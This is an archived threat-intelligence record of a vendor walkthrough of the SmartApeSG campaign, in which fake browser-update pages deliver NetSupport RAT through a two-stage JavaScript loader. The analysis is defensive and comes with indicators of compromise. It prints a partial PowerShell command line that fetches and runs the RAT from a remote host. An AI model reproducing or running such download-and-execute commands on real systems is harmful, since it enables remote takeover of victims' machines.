{
	"id": "0413920c-6b2b-4bed-8975-29193b56b1f4",
	"created_at": "2026-04-06T00:22:03.097598Z",
	"updated_at": "2026-04-10T13:11:53.391709Z",
	"deleted_at": null,
	"sha1_hash": "29ed1571bd06795566632bc946dd7c3a98bfa9f2",
	"title": "SmartApeSG walkthrough",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1228294,
	"plain_text": "SmartApeSG walkthrough\r\nBy Jerome Segura\r\nPublished: 2024-06-11 · Archived: 2026-04-05 20:08:55 UTC\r\nIn this walkthrough, we test SmartApeSG, a malware campaign distributed via compromised sites.\r\nSmartApeSG, tested on June 11, 2024\r\nDistribution\r\nSocial engineering attacks via fake browser updates are increasingly common. Criminals inject code into compromised websites, which then present unsuspecting website users with malware downloads disguised as browser updates. With little effort, threat actors can trick victims into executing malicious code and gain initial access to their machines.\r\nAbout one year ago, a new social engineering variant joined the fake browser updates club. We named it SmartApeSG (AKA ZPHP, HANEYMANEY) in reference to its hosting provider (SmartApe) and, of course, SocGholish, which started it all. Like its counterparts, it leverages compromised websites to load a fake browser update template. Victims are tricked into executing a file that will eventually download NetSupport RAT.\r\nTo start replaying this threat, we looked for previous indicators of compromise, in particular one of the domains that is being injected into legitimate websites. To change things up a little bit, we set Microsoft Edge as our default browser and visited one of those sites. After a few seconds, the page was hijacked and replaced with the following template:\r\nhttps://www.threatdown.com/blog/smartapesg-06-11-2024/\r\nPage 1 of 12\r\nThe overlay reads “You are using an older version of Edge” (that template is adapted based on your browser). It looks real, so much so that users will want to do the right thing and download this update.\r\nWhen we click on the ‘Update Edge’ button, it downloads a zip archive with the following naming convention: Update – [0-9]{5}.zip. After we extract the content of that archive, we see a main JavaScript file that has the static name Update 124.0.6367.158.js (at least for the current campaign) and a folder called Install, itself containing numerous ‘.dat’ files.\r\nThe file that victims will run is the JavaScript one; the others are there just for noise and to confuse security products. If you were to look at that file (it is over 20MB), you wouldn’t see a lot other than what appears to be a legitimate library:\r\nThere is malicious code in there, which we will cover a little bit later. For now, we simply execute the script by double-clicking on it. Not much actually happens: no installer screen or message indicating that the browser has been updated. If you reload the website you are on, it will display normally this time, which is perhaps enough of a trick.\r\nProcess flow\r\nIn the background, the script spawns a new PowerShell command responsible for downloading and executing the payload as client32.exe (NetSupport RAT):\r\n\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\admin\\Downloads\\Update 124.0.6367.158.js\"\r\n \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -Ex Bypass -NoP -C $YLHTCF='http://ps\r\n \"C:\\Users\\admin\\AppData\\Roaming\\OAPWDYLP10\\client32.exe\"\r\nThis process flow does not exactly show us what happens when we execute the malicious JavaScript. If we look at the network activity (more on this in the next section), we see that wscript.exe is contacting the same remote domain that served the template at the following URL: elvesofiax[.]com/cdn-vs/22per.php?[4digitid]\r\nThe server sends back a response that is 7.9MB. If we open it in a text editor, it looks like the same library we had from earlier, but with a notable difference: at the very end of the file is a gigantic blurb of encoded data:\r\nThis is interesting because it means the original script (Update 124.0.6367.158.js) was just setting the stage and this second one is the one that actually contains the malicious instructions. Using an online deobfuscator, we can now expose the PowerShell command:\r\nThe next steps in the infection process are for PowerShell to retrieve the final payload (NetSupport RAT) from the remote host psk777[.]casa:\r\nThis time we get a giant (10.1MB) Base64 encoded string that decodes to a zip archive. These are the NetSupport RAT files:\r\nNetwork summary\r\nSmartApeSG network traffic captured by mitmproxy, rules from fiddleitm:\r\nPost execution traffic (Wireshark):\r\nProtection\r\nWhen we first executed this payload, ThreatDown was already blocking the malicious domain hosting the fake template and the NetSupport RAT payload:\r\nIn order to see what EDR would record, we disabled all protections to let the attack happen without any impediments. The process graph summarizes the events that happened on the victim’s endpoint. In this case, we ran the script directly from the Downloads folder and let execution happen:\r\nThese are the events that were captured:\r\nJavaScript execution:\r\nPowerShell execution:\r\nNetSupport RAT downloaded and run from a folder within %appdata%:\r\nPersistence achieved via an autorun registry key:\r\nMitigations\r\nWe did not run the payload long enough to see what happens next, but it is likely that the infected endpoint would be remotely accessed by a malicious actor for further assessment.\r\nIt was interesting to see how the threat actors were using a two-stage scripting flow to invoke PowerShell. This gives them more flexibility to change their payload’s location, as well as possibly bypass detection from security engines.\r\nA solid network-based defense will keep SmartApeSG away from your users, and EDR will also give you great visibility into the attack chain. Finally, it’s important to remember that these incidents are often the precursor to data theft or ransomware.\r\nDid you like this walkthrough? For more, check out our index page here.\r\nIndicators of Compromise (IOCs)\r\nSample\r\n4cf69758cb191de3edc2030019c3bb0c56346de4e85b6badcce9aba8a23706fa\r\nSmartApeSG infrastructure (now on Stark Industries)\r\nelvesofiax[.]com\r\n45.150.65[.]147\r\nSecond JavaScript\r\nelvesofiax[.]com/cdn-vs/22per.php\r\nNetSupport RAT host\r\npsk777[.]casa\r\nNetSupport RAT C2\r\n94.158.245[.]103\r\nSource: https://www.threatdown.com/blog/smartapesg-06-11-2024/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.threatdown.com/blog/smartapesg-06-11-2024/"
	],
	"report_names": [
		"smartapesg-06-11-2024"
	],
	"threat_actors": [],
	"ts_created_at": 1775434923,
	"ts_updated_at": 1775826713,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/29ed1571bd06795566632bc946dd7c3a98bfa9f2.pdf",
		"text": "https://archive.orkl.eu/29ed1571bd06795566632bc946dd7c3a98bfa9f2.txt",
		"img": "https://archive.orkl.eu/29ed1571bd06795566632bc946dd7c3a98bfa9f2.jpg"
	}
}